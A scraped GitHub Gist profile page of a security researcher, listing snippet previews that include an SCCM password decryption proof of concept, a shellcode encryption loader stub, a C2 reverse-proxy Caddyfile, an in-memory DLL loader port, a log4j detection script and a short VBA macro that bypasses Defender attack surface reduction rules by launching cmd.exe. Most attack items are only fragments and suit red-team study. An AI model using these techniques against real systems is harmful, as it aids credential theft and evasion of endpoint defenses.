Skip to content

Instantly share code, notes, and snippets.

God is dead. Have you tried Node.js?

Marcello byt3bl33d3r

God is dead. Have you tried Node.js?
View GitHub Profile
byt3bl33d3r / sccmdecryptpoc.cs
Created Jul 4, 2022 — forked from xpn/sccmdecryptpoc.cs
SCCM Account Password Decryption POC
View sccmdecryptpoc.cs
// Twitter thread: (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
internal class Program
byt3bl33d3r /
Last active Jan 17, 2022
Structured logging and event capture
from logger import capturer
from typing import Optional
from fastapi import FastAPI
app = FastAPI()
async def get_logs(event_name: Optional[str] = None):
if not event_name:
byt3bl33d3r /
Created Dec 10, 2021
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (
#! /usr/bin/env python3
Needs Requests (pip3 install requests)
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License)
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021.
byt3bl33d3r / manager-config.yml
Created Nov 14, 2021
Nebula configuraton files for docker swarm manager and worker nodes
View manager-config.yml
# !! Remember to replace LIGHTHOUSE_IP with your actual Nebula lighthouse external IP Address
# See the example config file to know what all of these options do
ca: /etc/nebula/ca.crt
cert: /etc/nebula/host.crt
key: /etc/nebula/host.key
"": ["<LIGHTHOUSE_IP>:4242"]
byt3bl33d3r /
Created Oct 17, 2021 — forked from bontchev/
Curated list of links describing the leaked Equation Group tools for Windows

Links describing the leaked EQ Group tools for Windows

Repositories and ports

Installation and usage guides

byt3bl33d3r / mainc.c
Created Oct 2, 2021 — forked from jackullrich/mainc.c
Single Step Encryption/Decryption
View mainc.c
#include <Windows.h>
LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo);
typedef VOID(__stdcall* Shellcode)();
LPBYTE ShellcodeBuffer;
ULONG_PTR PreviousOffset;
ULONG_PTR CurrentOffset;
ULONGLONG InstructionCount;
DWORD dwOld;
byt3bl33d3r / Caddyfile
Last active Jan 23, 2022
Caddyfile reverse proxy example for C2 platforms
View Caddyfile
# This instructs Caddy to hit the LetsEncrypt staging endpoint, in production you should remove this.
(proxy_upstream) {
# Enable access logging to STDOUT
# This is our list of naughty client User Agents that we don't want accessing our C2
byt3bl33d3r / java-ikvm-dotnet
Created May 31, 2021 — forked from sixman9/java-ikvm-dotnet
Using IKVM to generate a C# assembly (dll) from a Java jar file
View java-ikvm-dotnet
I wanted to use the Flying Saucer Java API in .NET so I tried to use IKVM to convert the Flying Saucer library:
ikvmc core-renderer.jar
For some reason, IKVMC gave me an exe core-renderer.exe so I renamed it to core-renderer.dll, added to my assemblies and hacked away
using java.lang;
using com.lowagie.text;
byt3bl33d3r / Out-CompressedDll.nim
Last active Apr 10, 2022
Compresses, Base-64 encodes and outputs PowerShell code to load a managed dll in memory. Port of the orignal PowerSploit script to Nim.
View Out-CompressedDll.nim
Requires the zippy library ("nimble install zippy")
import zippy/[inflate, deflate]
import base64
byt3bl33d3r / ASR Rules Bypass.vba
Created Apr 9, 2021 — forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
View ASR Rules Bypass.vba
' ASR rules bypass creating child processes
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub